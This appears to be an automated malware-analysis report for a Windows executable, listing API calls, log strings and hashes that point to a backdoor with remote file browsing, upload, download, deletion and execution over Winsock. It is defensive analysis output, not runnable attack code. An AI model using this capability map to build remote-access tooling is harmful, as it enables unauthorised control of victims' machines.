                                                                                • ?resize@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEXI@Z.MSVCP60(00000001,?,?,?,?,?,00000055), ref: 004046B7
                                                                                • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@G@Z.MSVCP60(?,?,0000002A,?,?,?,?,?,00000055), ref: 004046CA
                                                                                • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,00000055), ref: 004046D6
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,00000055), ref: 004046E2
                                                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000055), ref: 004046F4
                                                                                • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000055), ref: 004046FD
                                                                                • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,?,0041594C), ref: 004044FA
                                                                                  • Part of subcall function 00403325: ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,?,?,00000000), ref: 0040333B
                                                                                  • Part of subcall function 00403325: FindFirstFileW.KERNEL32(00000000,?,?,00000000), ref: 00403342
                                                                                  • Part of subcall function 00403325: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(00000054), ref: 00403468
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,Unable to rename file!,0041B310,00415948), ref: 00404523
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,00415948), ref: 0040452D
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(00000059,?,?,?,?,?,00415948), ref: 00404547
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,00415948), ref: 00404550
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,00415948), ref: 00404559
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([INFO],?,?,?,Uploaded file: ,00000000,?,00000000,?,00000000,00000000), ref: 00403DC2
                                                                                  • Part of subcall function 0041203B: GetLocalTime.KERNEL32(?), ref: 00412052
                                                                                  • Part of subcall function 0041203B: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,%02i:%02i:%02i:%03i ,?,00416BFC,?,00415770,?,?,Q@,?), ref: 00412087
                                                                                  • Part of subcall function 0041203B: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,Q@,?), ref: 00412094
                                                                                  • Part of subcall function 0041203B: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,Q@,?), ref: 004120A1
                                                                                  • Part of subcall function 0041203B: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,Q@,?), ref: 004120AE
                                                                                  • Part of subcall function 0041203B: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,Q@,?), ref: 004120B8
                                                                                  • Part of subcall function 0041203B: printf.MSVCRT ref: 004120BF
                                                                                  • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120CB
                                                                                  • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120D4
                                                                                  • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120DD
                                                                                  • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120E6
                                                                                  • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120EF
                                                                                  • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120F8
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,Failed to upload file: ,00000000,?,00000000,?,00000000,00000000), ref: 00403E09
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([ERROR],?,?,?,Failed to upload file: ,00000000,?,00000000,?,00000000,00000000), ref: 00403E1A
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,00000000), ref: 00403E2E
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,00000000), ref: 00403E37
                                                                                  • Part of subcall function 004127F5: ?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ.MSVCP60(00000020,?,?,0040464E,?,?,00000055), ref: 00412804
                                                                                  • Part of subcall function 004127F5: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@IDABV?$allocator@D@1@@Z.MSVCP60(00000000,?,0040464E,?,?,00000055), ref: 0041280E
                                                                                  • Part of subcall function 004127F5: ?begin@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEPADXZ.MSVCP60(?,0040464E,?,?,00000055), ref: 00412817
                                                                                  • Part of subcall function 004127F5: ?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000,?,0040464E,?,?,00000055), ref: 00412821
                                                                                  • Part of subcall function 004127F5: ?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000,?,0040464E,?,?,00000055), ref: 0041282B
                                                                                  • Part of subcall function 004127F5: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,?,?,?,?,00000055), ref: 00412841
                                                                                  • Part of subcall function 004127F5: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,00000055), ref: 0041284A
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(00000000), ref: 00403D3D
                                                                                  • Part of subcall function 00412881: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(0041BA38,0041BCB0,00000000,0040903C,004140D8,00000000,0000000B), ref: 0041288D
                                                                                  • Part of subcall function 00412881: ??2@YAPAXI@Z.MSVCRT ref: 0041289B
                                                                                  • Part of subcall function 00412881: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 004128BD
                                                                                  • Part of subcall function 00412881: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E), ref: 004128DF
                                                                                  • Part of subcall function 00412881: ??3@YAXPAX@Z.MSVCRT ref: 004128E6
                                                                                  • Part of subcall function 00412881: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 004128F3
                                                                                  • Part of subcall function 00412881: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 004128FC
                                                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000,00000000,00000001,00000000), ref: 00403E6B
                                                                                • ShellExecuteW.SHELL32(00000000,open,00000000), ref: 00403E78
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,Executing file: ,00000000,?,?,?,?), ref: 00403E99
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([INFO],?,?,?,Executing file: ,00000000,?,?,?,?), ref: 00403EAA
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00403EBE
                                                                                • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,00000000,00000000), ref: 00403EE9
                                                                                • ?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ.MSVCP60(?,?,?,00000000), ref: 00403EFA
                                                                                • ?substr@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000000,-00000002,?,?,?,00000000), ref: 00403F0E
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,Browsing directory: ,00000000,?,?,?,00000000,?,?,?,00000000), ref: 00403F2C
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([INFO],?,?,?,Browsing directory: ,00000000,?,?,?,00000000,?,?,?,00000000), ref: 00403F3D
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00403F51
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00403F5D
                                                                                • GetLogicalDriveStringsA.KERNEL32 ref: 00403F74
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(?,00000064,?), ref: 00403F8A
                                                                                • ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIPBDII@Z.MSVCP60(004159C4,00000000,00000002), ref: 00403F9C
                                                                                • ?resize@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEXI@Z.MSVCP60(00000001), ref: 00403FA7
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 00403FB6
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,?,0041B310,00000000), ref: 00403FD8
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,00000000), ref: 00403FE2
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(00000051,?,?,?,?,?,00000000), ref: 00403FFC
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,00000000), ref: 00404008
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,00000001,0041B310,00000000,00000002,0041B310,00000000), ref: 00404083
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,00000002,0041B310,00000000), ref: 00404093
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,0041B310,00000000), ref: 004040A3
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,0041B310,00000000), ref: 004040AD
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004040C8
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004040D4
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004040E0
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,Expected file size: ,00000000), ref: 004040FC
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([DEBUG],?,?,?,Expected file size: ,00000000), ref: 0040410E
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,Downloading file: ,00000000,?,00000000,?,00000000,00000000), ref: 00404148
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([INFO],?,?,?,Downloading file: ,00000000,?,00000000,?,00000000,00000000), ref: 0040415A
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,00000000), ref: 0040416E
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,00000000), ref: 0040417A
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,?,00000000), ref: 00404187
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,00000000), ref: 00404342
                                                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 00404378
                                                                                • StrToIntA.SHLWAPI(00000000), ref: 0040437F
                                                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000001), ref: 004043A2
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,00000055), ref: 0040470E
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,00000055), ref: 0040471F
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,00000055), ref: 00404728
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.903195414.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.903223606.000000000041D000.00000040.00000001.sdmp Download File
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: V?$allocator@$U?$char_traits@$D@std@@$D@2@@std@@$G@std@@$??1?$basic_string@$G@2@@std@@$??0?$basic_string@$V?$basic_string@$Hstd@@$D@2@@0@$D@1@@$?c_str@?$basic_string@$V01@@$V10@@$?length@?$basic_string@$V10@0@$File$V01@V12@$V10@$?substr@?$basic_string@FindG@2@@0@wcscpy$??4?$basic_string@?size@?$basic_string@CreateDirectoryG@1@@Y?$basic_string@wcscat$?begin@?$basic_string@?empty@?$basic_string@?find@?$basic_string@?resize@?$basic_string@?rfind@?$basic_string@A?$basic_string@FirstRemove$??2@??3@??8std@@??9std@@?append@?$basic_string@?data@?$basic_string@?end@?$basic_string@AttributesCloseDeleteDriveEventExecuteLocalLogicalNextShellStringsTime_itoa_wrenameatoiclosesocketprintfrecvsend
                                                                                • String ID: Browsing directory: $Deleted file: $Downloaded file size: $Downloaded file: $Downloading file: $Executing file: $Expected file size: $Failed to download file: $Failed to upload file: $Unable to delete: $Unable to rename file!$Uploaded file: $[DEBUG]$[ERROR]$[INFO]$open
                                                                                • API String ID: 1698304352-2559757301
                                                                                • Opcode ID: 4534f3061b2a73a9a8328c332a5244eb0c0100669159570fe693710d213d51e3
                                                                                • Instruction ID: cb52a323490428edf8fa9013e568b6c0705a1129d991cf782fce7d07dea18215
                                                                                • Opcode Fuzzy Hash: 4534f3061b2a73a9a8328c332a5244eb0c0100669159570fe693710d213d51e3
                                                                                • Instruction Fuzzy Hash: 4D528DB2910508EBCB05FBA1DC8ADEE773CFB54345F00456AF516A30A1EF785A84CB69
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0040477E, Relevance: 88.8, APIs: 59, Instructions: 322filethreadCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • _EH_prolog.MSVCRT ref: 00404783
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,00000004,0041B310), ref: 004047A0
                                                                                • #23.WS2_32(00000000,00000001,00000006), ref: 004047B3
                                                                                • #4.WS2_32(00000000,0041B320,00000010,00000000,00000001,00000006), ref: 004047C2
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,?,0041B310,?,00000000,00000001,00000006), ref: 004047EB
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,00000000,00000001,00000006), ref: 004047F5
                                                                                  • Part of subcall function 00402440: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(0041BE70,?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 0040244A
                                                                                  • Part of subcall function 00402440: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60([DataStart],00000013,?,?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 00402463
                                                                                  • Part of subcall function 00402440: ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP60(0000000B,?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 0040246E
                                                                                  • Part of subcall function 00402440: ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP60(0000000F,?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 0040247B
                                                                                  • Part of subcall function 00402440: ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 0040248D
                                                                                  • Part of subcall function 00402440: ?empty@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE_NXZ.MSVCP60(?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 00402498
                                                                                  • Part of subcall function 00402440: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 004024A7
                                                                                  • Part of subcall function 00402440: ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 004024B1
                                                                                  • Part of subcall function 00402440: #19.WS2_32(?,00000000,?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 004024BB
                                                                                  • Part of subcall function 00402440: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 00402512
                                                                                  • Part of subcall function 00402440: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 0040251B
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000001,00000006), ref: 0040481B
                                                                                • _CxxThrowException.MSVCRT(00000001,00416FB8), ref: 0040483B
                                                                                • ?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000001,00000006), ref: 00404849
                                                                                • ?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000001,00000006), ref: 00404853
                                                                                • ?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000001,00000006), ref: 0040485D
                                                                                • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,?,0041594C,?), ref: 00404883
                                                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,?,?), ref: 0040488D
                                                                                • FindFirstFileW.KERNEL32(00000000,?,?,?), ref: 00404894
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?), ref: 004048A3
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00415664,?), ref: 004048C2
                                                                                • _CxxThrowException.MSVCRT(00000002,00416FB8), ref: 004048E8
                                                                                • FindNextFileW.KERNEL32(000000FF,?,?,?,?), ref: 004048F7
                                                                                • wcscmp.MSVCRT ref: 00404924
                                                                                • wcscmp.MSVCRT ref: 0040493C
                                                                                • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(?,?,00415A24), ref: 00404961
                                                                                • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z.MSVCP60(?,?,00000000), ref: 00404973
                                                                                • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 00404983
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00404991
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040499D
                                                                                • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 004049AC
                                                                                • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 004049BE
                                                                                  • Part of subcall function 00404C0A: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,0041B310,?,00018426), ref: 00404C1F
                                                                                  • Part of subcall function 00404C0A: ?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60(00018430,?,00018426), ref: 00404C2F
                                                                                  • Part of subcall function 00404C0A: ?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60(00000000,?,00018426), ref: 00404C39
                                                                                  • Part of subcall function 00404C0A: ?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60(00000000,?,00018426), ref: 00404C43
                                                                                  • Part of subcall function 00404C0A: ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,?,0041594C,?), ref: 00404C66
                                                                                  • Part of subcall function 00404C0A: ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,?,?), ref: 00404C70
                                                                                  • Part of subcall function 00404C0A: FindFirstFileW.KERNEL32(00000000,?,?,?), ref: 00404C77
                                                                                  • Part of subcall function 00404C0A: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?), ref: 00404C83
                                                                                  • Part of subcall function 00404C0A: FindNextFileW.KERNEL32(000000FF,?,?,?,?), ref: 00404C9D
                                                                                  • Part of subcall function 00404C0A: wcscmp.MSVCRT ref: 00404CCA
                                                                                  • Part of subcall function 00404C0A: wcscmp.MSVCRT ref: 00404CE2
                                                                                  • Part of subcall function 00404C0A: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(?,?,0000005C), ref: 00404CFA
                                                                                  • Part of subcall function 00404C0A: ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z.MSVCP60(?,000000FF,00000000), ref: 00404D0C
                                                                                  • Part of subcall function 00404C0A: ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@G@Z.MSVCP60(?,00000000), ref: 00404D19
                                                                                  • Part of subcall function 00404C0A: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00404D27
                                                                                  • Part of subcall function 00404C0A: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00404D30
                                                                                  • Part of subcall function 00404C0A: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 00404D3F
                                                                                  • Part of subcall function 00404C0A: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 00404D4E
                                                                                • _CxxThrowException.MSVCRT(00000003,00416FB8), ref: 004049E5
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(00000003,00416FB8), ref: 004049F0
                                                                                • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(?,?,?,?,?), ref: 00404A0A
                                                                                • ?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60(?,?,?), ref: 00404A1C
                                                                                • ?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60(00000000,?,?,?), ref: 00404A29
                                                                                • ?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60(00000000,?,?,?), ref: 00404A36
